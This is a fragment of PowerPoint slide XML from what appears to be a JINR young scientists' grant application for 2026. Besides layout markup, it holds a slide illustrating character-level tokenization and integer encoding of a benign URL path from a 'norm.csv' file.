            <a:ext cx="12192480" cy="6858720"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12192480" cy="6858720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="194" name="Прямая соединительная линия 161"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609840" y="0"/>
              <a:ext cx="1080" cy="6859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195" name="Прямая соединительная линия 162"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1829160" y="0"/>
              <a:ext cx="1080" cy="6859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196" name="Прямая соединительная линия 163"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3048120" y="0"/>
              <a:ext cx="1080" cy="6859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197" name="Прямая соединительная линия 164"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4267440" y="0"/>
              <a:ext cx="1080" cy="6859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198" name="Прямая соединительная линия 165"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5486400" y="0"/>
              <a:ext cx="1080" cy="6859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199" name="Прямая соединительная линия 166"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6705720" y="0"/>
              <a:ext cx="1080" cy="6859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200" name="Прямая соединительная линия 167"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7924680" y="0"/>
              <a:ext cx="1080" cy="6859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201" name="Прямая соединительная линия 168"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9144000" y="0"/>
              <a:ext cx="1080" cy="6859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202" name="Прямая соединительная линия 169"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10362960" y="0"/>
              <a:ext cx="1080" cy="6859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203" name="Прямая соединительная линия 170"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11582280" y="0"/>
              <a:ext cx="1080" cy="6859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204" name="Прямая соединительная линия 171"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="386280"/>
              <a:ext cx="12190320" cy="1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205" name="Прямая соединительная линия 172"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="1611000"/>
              <a:ext cx="12190320" cy="1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206" name="Прямая соединительная линия 173"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="2835720"/>
              <a:ext cx="12190320" cy="1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207" name="Прямая соединительная линия 174"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="4060440"/>
              <a:ext cx="12190320" cy="1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208" name="Прямая соединительная линия 175"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="5285160"/>
              <a:ext cx="12190320" cy="1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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="209" name="Прямая соединительная линия 176"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="6509880"/>
              <a:ext cx="12190320" cy="1080"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:solidFill>
                <a:srgbClr val="D9D9D9">
                  <a:alpha val="30000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="210" name="Группа 177"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="12192480" cy="6858720"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="12192480" cy="6858720"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="211" name="Прямая соединительная линия 195"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="225360" y="0"/>
                <a:ext cx="6816960" cy="685908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12" name="Прямая соединительная линия 196"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1449000" y="0"/>
                <a:ext cx="6816960" cy="685908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13" name="Прямая соединительная линия 197"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2665800" y="0"/>
                <a:ext cx="6816960" cy="685908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14" name="Прямая соединительная линия 198"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3884760" y="0"/>
                <a:ext cx="6817320" cy="685908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15" name="Прямая соединительная линия 199"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5106240" y="0"/>
                <a:ext cx="6816960" cy="685908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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="216" name="Группа 200"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6327720" y="0"/>
                <a:ext cx="5864760" cy="5899320"/>
                <a:chOff x="6327720" y="0"/>
                <a:chExt cx="5864760" cy="5899320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="217" name="Прямая соединительная линия 206"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6327720" y="0"/>
                  <a:ext cx="5865120" cy="589968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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="218" name="Прямая соединительная линия 207"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7549200" y="0"/>
                  <a:ext cx="4643640" cy="467316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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="219" name="Прямая соединительная линия 208"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8772840" y="0"/>
                  <a:ext cx="3420000" cy="345780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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="220" name="Прямая соединительная линия 209"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9982080" y="0"/>
                  <a:ext cx="2210760" cy="222732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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="221" name="Прямая соединительная линия 210"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="11198880" y="0"/>
                  <a:ext cx="993960" cy="100332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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="222" name="Прямая соединительная линия 201"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="1011960"/>
                <a:ext cx="5829840" cy="584676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23" name="Прямая соединительная линия 202"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="2227320"/>
                <a:ext cx="4615560" cy="463140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24" name="Прямая соединительная линия 203"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="3431880"/>
                <a:ext cx="3399480" cy="342684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25" name="Прямая соединительная линия 204"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="4651200"/>
                <a:ext cx="2197440" cy="220752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26" name="Прямая соединительная линия 205"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="5864400"/>
                <a:ext cx="987840" cy="99432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</p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="227" name="Группа 178"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="12192480" cy="6858720"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="12192480" cy="6858720"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="228" name="Прямая соединительная линия 179"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="5150520" y="0"/>
                <a:ext cx="6816960" cy="685908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29" name="Прямая соединительная линия 180"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="3926880" y="0"/>
                <a:ext cx="6816960" cy="685908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30" name="Прямая соединительная линия 181"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="2710080" y="0"/>
                <a:ext cx="6816960" cy="685908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31" name="Прямая соединительная линия 182"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="1490760" y="0"/>
                <a:ext cx="6816960" cy="685908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32" name="Прямая соединительная линия 183"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="269280" y="0"/>
                <a:ext cx="6816960" cy="685908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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="233" name="Группа 184"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5864760" cy="5899320"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="5864760" cy="5899320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="234" name="Прямая соединительная линия 190"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="0"/>
                  <a:ext cx="5865120" cy="589968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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="235" name="Прямая соединительная линия 191"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="0"/>
                  <a:ext cx="4643640" cy="467316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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="236" name="Прямая соединительная линия 192"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="0"/>
                  <a:ext cx="3420000" cy="345780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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="237" name="Прямая соединительная линия 193"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="0"/>
                  <a:ext cx="2210760" cy="222732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30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="238" name="Прямая соединительная линия 194"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="0"/>
                  <a:ext cx="993960" cy="1003320"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="0">
                  <a:solidFill>
                    <a:srgbClr val="D9D9D9">
                      <a:alpha val="30000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="239" name="Прямая соединительная линия 185"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="6363000" y="1011960"/>
                <a:ext cx="5829840" cy="584676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40" name="Прямая соединительная линия 186"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="7576920" y="2227320"/>
                <a:ext cx="4615920" cy="463140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41" name="Прямая соединительная линия 187"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="8793360" y="3431880"/>
                <a:ext cx="3399480" cy="342684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42" name="Прямая соединительная линия 188"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="9995400" y="4651200"/>
                <a:ext cx="2197440" cy="220752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  <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="243" name="Прямая соединительная линия 189"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="11204640" y="5864400"/>
                <a:ext cx="988200" cy="994320"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9">
                    <a:alpha val="30000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
      </p:grpSp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444760"/>
            <a:ext cx="10968840" cy="93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CH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Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4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09480" y="3391200"/>
            <a:ext cx="3657240" cy="419400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" tIns="0" rIns="45720" bIns="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CH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lang="ru-RU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sldNum" idx="49"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275400" y="6356520"/>
            <a:ext cx="6681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7DDD6A9-A6BA-4437-A4A6-70B050C66EB9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1523880" y="1884240"/>
            <a:ext cx="9141840" cy="2385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000" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2D568B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Заявка на соискание грантов молодых ученых и специалистов ОИЯИ,</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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000" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2D568B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>стипендий им. М.Г. Мещерякова и Н.Н. Говоруна на 2026 год</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523880" y="4611600"/>
            <a:ext cx="9141840" cy="1653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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="3465A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Ильина Анна,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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="3465A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>младший научный сотрудник НТО ВКиРИС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55" name="Группа 254"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4680360" y="-81360"/>
            <a:ext cx="2829600" cy="757080"/>
            <a:chOff x="4680360" y="-81360"/>
            <a:chExt cx="2829600" cy="757080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="256" name="Рисунок 255"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6748920" y="63360"/>
              <a:ext cx="761040" cy="477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57" name="Рисунок 256"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4680360" y="-81360"/>
              <a:ext cx="1981080" cy="7570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9" name="Дата 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A890653-83D5-426E-9C6A-810EDED42A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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92DAFBCF-0DB4-4807-9FBF-8D898AB60D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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A58FD846-8247-4CB3-9041-DBC74B5EDDA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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8A92EFE-9088-4D4D-975C-C4DE1916187D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1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Прямоугольник 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236520" y="816840"/>
            <a:ext cx="2026800" cy="344613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1260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480" tIns="33480" rIns="78480" bIns="33480" anchor="t" anchorCtr="1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i="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>norm.csv</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" b="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="Arial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113760" y="2113560"/>
            <a:ext cx="2523960" cy="53568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100" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00A933"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>/jinrex/calendar/</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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3" name="Прямая соединительная линия 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1225080" y="1199160"/>
            <a:ext cx="360" cy="842400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19080">
            <a:solidFill>
              <a:srgbClr val="666666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4" name="Овал 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3105360" y="566280"/>
            <a:ext cx="7391160" cy="1366560"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DEE6EF"/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5" name="Прямая соединительная линия 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2325240" y="967320"/>
            <a:ext cx="887760" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19080">
            <a:solidFill>
              <a:srgbClr val="666666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-36720" rIns="81720" bIns="-3672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6" name="Прямоугольник 315"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9510480" y="1109520"/>
            <a:ext cx="407880" cy="34488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…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7" name="Прямоугольник 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601800" y="121716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0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8" name="Прямоугольник 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601800" y="90540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&lt;PAD&gt;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9" name="Прямоугольник 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4330440" y="121716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1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0" name="Прямоугольник 319"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4330440" y="90540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&lt;SOS&gt;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1" name="Прямоугольник 320"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5059080" y="121716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2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5059080" y="90540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&lt;EOS&gt;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5787720" y="121716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3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4" name="Прямоугольник 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787720" y="90540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&lt;UNK&gt;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5" name="Прямоугольник 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516360" y="121716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4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6" name="Прямоугольник 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516360" y="90540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/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7245000" y="121716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5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8" name="Прямоугольник 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245000" y="90540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j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9" name="Прямоугольник 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973640" y="121716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6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7973640" y="90540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1" name="Прямоугольник 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8702280" y="121716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7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2" name="Прямоугольник 331"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8702280" y="905400"/>
            <a:ext cx="727200" cy="310320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B4C7D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n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3" name="Прямоугольник 332"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820120" y="1564920"/>
            <a:ext cx="1630080" cy="4039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i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Vocabulary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2459160" y="2155680"/>
            <a:ext cx="5386320" cy="275545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36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['&lt;SOS&gt;', '/', 'j', 'i', 'n', 'r', 'e', 'x', '/', 'c', 'a', 'l', 'e', 'n', 'd', 'a', 'r', '/', '&lt;EOS&gt;']</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Прямоугольник 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8217000" y="2158920"/>
            <a:ext cx="3973680" cy="321840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36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[1, 4, 5, 6, 7, 8, 9, 10, 4, 19, 31, 11, 9, 7, 26, 31, 8, 4, 2]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6" name="Прямая соединительная линия 335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154600" y="2310480"/>
            <a:ext cx="304560" cy="36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-36720" rIns="81720" bIns="-3672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7" name="Прямая соединительная линия 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7878600" y="2317680"/>
            <a:ext cx="304560" cy="36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-36720" rIns="81720" bIns="-3672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38" name="Группа 337"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="140040" y="3750840"/>
            <a:ext cx="1642680" cy="1374480"/>
            <a:chOff x="140040" y="3750840"/>
            <a:chExt cx="1642680" cy="1374480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="339" name="Прямоугольник 338"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="140040" y="3750840"/>
              <a:ext cx="1416960" cy="1191240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEDCE6"/>
            </a:solidFill>
            <a:ln w="12600">
              <a:solidFill>
                <a:srgbClr val="55308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8480" tIns="33480" rIns="78480" bIns="3348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ourier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="340" name="Прямоугольник 339"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="258480" y="3848040"/>
              <a:ext cx="1416960" cy="1191240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEDCE6"/>
            </a:solidFill>
            <a:ln w="12600">
              <a:solidFill>
                <a:srgbClr val="55308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8480" tIns="33480" rIns="78480" bIns="3348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ourier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Прямоугольник 340"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="365760" y="3934080"/>
              <a:ext cx="1416960" cy="1191240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEDCE6"/>
            </a:solidFill>
            <a:ln w="12600">
              <a:solidFill>
                <a:srgbClr val="55308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8480" tIns="33480" rIns="78480" bIns="33480" anchor="ctr" anchorCtr="1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100" b="0" u="none" strike="noStrike" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="Courier New"/>
                </a:rPr>
